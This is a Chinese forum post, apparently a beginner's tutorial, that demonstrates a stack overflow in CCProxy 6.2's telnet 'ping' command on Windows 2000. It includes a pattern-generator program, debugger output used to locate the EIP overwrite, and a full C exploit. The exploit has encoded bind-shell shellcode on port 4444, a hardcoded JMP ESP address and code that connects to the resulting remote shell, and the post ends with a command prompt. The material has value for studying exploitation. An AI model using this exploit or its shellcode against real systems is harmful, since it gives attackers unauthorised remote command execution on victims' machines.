|
写给像我一样的菜鸟,呵呵,不知道有没有说错话,回贴时别伤偶自尊,上次差点跳楼.........
很久前就有想学下溢出的念头,最近工作不是很忙,看了最新出的CCProxy 6.2溢出,小试一下
PS:其实漏洞出来很长时间了 -:(
Tools: VC++ 6.0、NTSD.exe (NT以上系统统自带)
Platform : Microsoft Windows 2000 [Version 5.00.2195]
先贴一个我以前写的测试溢出点的程序(改某牛人的)
#include <stdio.h>
int main(int argc,char **argv)
{
char *buff;
int i,Len;
if(argc < 3)
{
printf("Magic Char By CoolDiyer\n");
printf("Usage:\n\t mc -c <count> [-v]\n");
return -1;
}
Len=atoi(argv[2]);
buff=(char *)malloc(Len+1);
buff[Len]=0;
for(i=0;i<Len;i++)
{
switch(i%4)
{
case 0: buff[i] = 'A'+i/(26*26*26)%26; break;
case 1: buff[i] = 'A'+i/(26*26)%26; break;
case 2: buff[i] = 'A'+i/26%26; break;
case 3: buff[i] = 'A'+i%26; break;
}
}
if(argc == 4)
{
for(i=1; i< Len+1; i++)
{
printf("%c",buff[i-1]);
if(i%4 == 0)
{
printf("\t%d\t0x%.2x",i,i);
printf("\tEIP ==> 0x%.2x%.2x%.2x%.2x\n",buff[i-1],buff[i-2],buff[i-3],buff[i-4]);
}
}
} else {
printf("%s\n",buff);
}
return 0;
}
程序编译后如下
Magic Char By CoolDiyer
Usage:
mc -c <count> [-v]
主要功能是生成字符串,如mc -c 200 生成一个200字节长的字符串
AAADAAAHAAALAAAPAAATAAAXAABBAABFAABJAABNAABRAABVAABZAACDAACHAACLAACPAACTAACXAADBAADFAADJAADNAADRAADV
执行mc -c 100 -v
AAAD 4 0x04 EIP ==> 0x44414141 (溢出时EIP的值)
AAAH 8 0x08 EIP ==> 0x48414141
AAAL 12 0x0c EIP ==> 0x4c414141
AAAP 16 0x10 EIP ==> 0x50414141
AAAT 20 0x14 EIP ==> 0x54414141
AAAX 24 0x18 EIP ==> 0x58414141
AABB 28 0x1c EIP ==> 0x42424141
AABF 32 0x20 EIP ==> 0x46424141
AABJ 36 0x24 EIP ==> 0x4a424141
AABN 40 0x28 EIP ==> 0x4e424141
AABR 44 0x2c EIP ==> 0x52424141
AABV 48 0x30 EIP ==> 0x56424141
AABZ 52 0x34 EIP ==> 0x5a424141
AACD 56 0x38 EIP ==> 0x44434141
AACH 60 0x3c EIP ==> 0x48434141
AACL 64 0x40 EIP ==> 0x4c434141
AACP 68 0x44 EIP ==> 0x50434141
AACT 72 0x48 EIP ==> 0x54434141
AACX 76 0x4c EIP ==> 0x58434141
AADB 80 0x50 EIP ==> 0x42444141
AADF 84 0x54 EIP ==> 0x46444141
AADJ 88 0x58 EIP ==> 0x4a444141
AADN 92 0x5c EIP ==> 0x4e444141
AADR 96 0x60 EIP ==> 0x52444141
AADV 100 0x64 EIP ==> 0x56444141
看到这里也许一些人就明白了,原理是借助于英文26个字母实现了26进制,4位最多可以到ZZZZ也就是26的4次方就是十进制的456976
十六进制的0x6f910,原理是因为编译器字节对齐默认情况下是按双字(4bytes)对齐的。看下实例就知道。
_____________________________________________________________________________________________________________________
安装CCProxy 6.2,运行后,查看进程ID为1306,执行“ntsd -p 1306”,输入“g”,开始调试程序,
用mc.exe生成一个3000字节的字符串,呵呵,反正够用了,如下
mc -c 3000 >a.txt
然后打开a.txt,开头加上“ping ”,注意ping后有个空格,然后先Ctrl+A,再Ctrl+C
telnet localhost 23
看到欢迎界面后直接点右键就可以粘贴,看ntsd里发生的情况.如下
0:021> g
NTSD: access violation
eax=ffffffff ebx=000002c8 ecx=00002736 edx=00000001 esi=019f82fd edi=019f86fd
eip=424e4241 esp=019f6700 ebp=012d04f0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
424e4241 ?? ???
输入“d esp”
0:002> d esp
019f6700 41 41 41 48 41 41 41 4c-41 41 41 50 41 41 41 54 AAAHAAALAAAPAAAT
019f6710 41 41 41 58 41 41 42 42-41 41 42 46 41 41 42 4a AAAXAABBAABFAABJ
019f6720 41 41 42 4e 41 41 42 52-41 41 42 56 41 41 42 5a AABNAABRAABVAABZ
019f6730 41 41 43 44 41 41 43 48-41 41 43 4c 41 41 43 50 AACDAACHAACLAACP
019f6740 41 41 43 54 41 41 43 58-41 41 44 42 41 41 44 46 AACTAACXAADBAADF
019f6750 41 41 44 4a 41 41 44 4e-41 41 44 52 41 41 44 56 AADJAADNAADRAADV
019f6760 41 41 44 5a 41 41 45 44-41 41 45 48 41 41 45 4c AADZAAEDAAEHAAEL
019f6770 41 41 45 50 41 41 45 54-41 41 45 58 41 41 46 42 AAEPAAETAAEXAAFB
0:002>
可以看到EIP为0x424e4241,而且ESP刚好指向提交的字符串,shellcode就呼之于出了,
查看溢出时覆盖EIP的字符串的位置,命令如下
mc -c 3000 -v | find "0x424e4241"
命令返回
ABNB 1016 0x3f8 EIP ==> 0x424e4241
是字符串的1016-4的这个位置,找到了
查看ESP指向的位置
mc -c 3000 -v | find "AAAH"
命令返回
AAAH 8 0x08 EIP ==> 0x48414141
是字符串的第四个字节开始的四人字符
OK,现在开始写溢出程序(呵呵,只调试一次就OK,爽吧)实现过程很简单,就是覆盖EIP为windows下一个通用的JMP ESP的位置"\x12\x45\xfa\x7f"
以下代码改写自《网络渗透技术》
_____________________________________________________________________________________________________________________
/* exploit.c
*
* CCProxy 溢出演示程序
* 作者:cooldiyer
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
// jmp esp address of chinese version
#define JUMPESP "\x12\x45\xfa\x7f"
// Bind Port 4444
char shellcode[] =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92"
"\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f"
"\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8"
"\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae"
"\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38"
"\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x92\xe8\xa9\xab\x07\xae\xec"
"\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b"
"\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38"
"\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71"
"\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9"
"\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0"
"\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb"
"\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c"
"\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6"
"\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb"
"\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44"
"\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8"
"\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9";
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l==1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
int main(int argc, char *argv[])
{
SOCKET c,s;
WSADATA WSAData;
char Buff[3008],Recv[1024];
int i,nRet;
if (argc < 3)
{
fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
exit(1);
}
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
memset(Buff, 0x90, sizeof(Buff)-1); // NOP 填充
memcpy(&Buff[0],"ping ",5);
memcpy(&Buff[3005],"\r\n\0",3); // sizeof("ping ")+3000=3005
memcpy(&Buff[1017], JUMPESP,4); // sizeof("ping ")+1012=1017
memcpy(&Buff[9], shellcode,sizeof(shellcode)-1); // sizeof("ping ")+4=9
printf("[+] Connect %s Port %s\n",argv[1],argv[2]);
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if(s<0)
{
printf("[-] connect err.\n");
exit(1);
}
memset(Recv,0,sizeof(Recv));
recv(s,Recv,sizeof(Recv),0);
nRet=send(s,Buff,sizeof(Buff),0);
printf("[+] Send %d Bytes OK........\n[+] Wait For Connect To Shell\n",nRet);
Sleep(1000);
c = Make_Connection(argv[1], 4444, 10);
shell(c);
WSACleanup();
return 1;
}
_____________________________________________________________________________________________________________________
好了,执行 exploit 127.0.0.1 23 返回结果如下
[+] Connect 127.0.0.1 Port 23
[+] Send 3008 Bytes OK........
[+] Wait For Connect To Shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\>
成功得到一个shell,个人精力有限,其它OS没有测试,只学一个原理,谢谢。。。。。 |
